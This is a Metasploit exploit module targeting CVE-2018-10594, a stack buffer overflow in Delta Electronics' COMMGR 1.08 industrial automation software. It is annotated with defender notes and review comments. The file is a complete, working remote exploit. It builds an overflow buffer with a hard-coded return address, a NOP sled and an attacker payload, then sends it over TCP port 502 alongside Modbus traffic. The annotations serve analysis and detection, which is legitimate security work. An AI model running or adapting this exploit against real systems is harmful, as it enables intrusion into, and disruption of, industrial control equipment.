##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit exploit module for CVE-2018-10594: a stack-based buffer overflow
# in Delta Electronics Delta Industrial Automation COMMGR 1.08 (COMMGR.exe).
#
# Defender notes, all taken from the module body below:
#   * The service is reached over plain TCP; RPORT defaults to 502, the port
#     IANA assigns to Modbus/TCP, so this traffic can sit alongside ordinary
#     ICS polling.
#   * The whole attempt is one connection and one write of
#     Offset (4164) + 4 + 4 + 40 + payload bytes, i.e. at most 4852 bytes
#     given the 640-byte payload 'Space' declared here. Nothing is read back,
#     so the module itself never learns whether it succeeded.
#   * A single hard-coded return address inside COMMGR.exe is used, so the
#     module presumably depends on COMMGR.exe loading at a fixed image base
#     (no ASLR) — confirm against the binary's build flags.
#   * Reliability, stability and side effects are declared UNKNOWN below; a
#     failed attempt may therefore leave COMMGR.exe crashed rather than
#     running.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  # Declares the module metadata (name, references, payload constraints, the
  # single target) and registers RPORT, defaulting to 502.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow',
        'Description' => %q{
          This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial
          Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially
          crafted packets. This module has been tested successfully on Delta Electronics Delta
          Industrial Automation COMMGR 1.08 over
          Windows XP SP3,
          Windows 7 SP1, and
          Windows 8.1.
        },
        'Author' => [
          'ZDI', # Initial discovery
          't4rkd3vilz', # PoC
          'hubertwslin' # Metasploit module
        ],
        'References' => [
          [ 'CVE', '2018-10594' ],
          [ 'BID', '104529' ],
          [ 'ZDI', '18-586' ],
          [ 'ZDI', '18-588' ],
          [ 'EDB', '44965' ],
          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-172-01' ]
        ],
        'Payload' => {
          'Space' => 640, # upper bound on payload.encoded, which #exploit sends last
          'DisableNops' => true, # #exploit appends its own 40-byte sled via make_nops
          'BadChars' => "\x00" # NUL must not appear in the encoded payload
        },
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'COMMGR 1.08 / Windows Universal',
            {
              # p/p/r COMMGR.exe — one fixed address in the main image for every
              # listed Windows version, i.e. a non-relocated base is assumed
              # (not verifiable from this file).
              'Ret' => 0x00401e14,
              'Offset' => 4164 # bytes of filler sent before the overwrite
            }
          ],
        ],
        'DisclosureDate' => '2018-07-02',
        'DefaultTarget' => 0,
        # No reliability/stability/side-effect assessment has been recorded.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(502)
      ]
    )
  end

  # Builds the overflow buffer and delivers it in a single TCP write.
  #
  # Buffer layout, in order: Offset bytes of random alphabetic filler, a
  # 4-byte short jump, the packed Ret address, a 40-byte NOP sled, then the
  # encoded payload. The filler is regenerated on every run, so only the
  # short jump and the packed Ret are constant across attempts; the sled and
  # payload come from the framework's generators and presumably vary too.
  # Nothing is read from the socket, so success is not confirmed here.
  #
  # @return [void]
  def exploit
    data = rand_text_alpha(target['Offset'])
    data << "\xeb\x27\x90\x90" # jmp short $+27 to the NOP sled
    data << [target.ret].pack("V") # 32-bit little-endian
    data << make_nops(40)
    data << payload.encoded

    # NOTE(review): String#length counts characters; unless data is a
    # binary-encoded string this can under-report the bytes actually written
    # below — bytesize would be the unambiguous count. Confirm the encoding
    # rand_text_alpha returns before changing it.
    print_status("Trying target #{target.name}, sending #{data.length} bytes...")
    connect
    sock.put(data)
    disconnect
  end
end